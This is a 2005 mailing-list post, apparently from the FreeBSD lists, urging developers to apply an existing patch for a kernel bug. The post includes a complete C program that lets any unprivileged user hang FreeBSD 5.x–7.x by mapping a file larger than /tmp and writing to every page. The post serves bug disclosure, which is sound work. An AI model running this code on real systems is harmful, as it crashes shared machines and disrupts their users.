Today I happened to read this message on freebsd-stable:
http://lists.freebsd.org/pipermail/freebsd-stable/2005-October/019086.html

After I read all the messages and related links, I feel so frustrated: why does nobody take fixing this bug seriously, even though we have a patch for it? I can repeat this bug on 7.0-CURRENT and 6.0-RC1 easily as a normal user! The system stops responding, so I have to power cycle it. The patch made by Uwe Doering actually works well. This bug looks like a security hole to me :(

If you guys don't like this patch, please give a reason and come up with a better patch or solution.

For the impatient, you can run this to crash your system (7.x, 6.x, 5.x); you have to increase FILELEN to a size greater than your /tmp partition:

===============================================
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <err.h>
#include <sys/types.h>
#include <sys/mman.h>

#define FILENAME "/tmp/test"   /* where to put the test file */
#define FILELEN  710           /* test file length in MB */

int
main(void)
{
	int fd;
	size_t len;
	char *buf, *p, *lim;

	len = FILELEN * 1024 * 1024;

	/* Create the test file and extend it to len bytes. */
	if ((fd = open(FILENAME, O_RDWR|O_CREAT|O_TRUNC, 0666)) == -1)
		err(2, "open() failed");
	if (ftruncate(fd, len) == -1)
		err(2, "ftruncate() failed");

	/* Map the whole file as shared, writable memory. */
	buf = mmap(NULL, len, PROT_WRITE, MAP_SHARED, fd, 0);
	if (buf == MAP_FAILED)
		err(2, "mmap() failed");
	(void)close(fd);

	/* Write one byte at every 4096-byte step of the mapping. */
	for (p = buf, lim = p + len; p < lim; p += 4096)
		*p = '0';

	if (munmap(buf, len) == -1)
		err(2, "munmap() failed");
	exit(0);
}
===============================================================

Cai, Quanqing

Received on Mon Oct 31 2005 - 09:59:58 UTC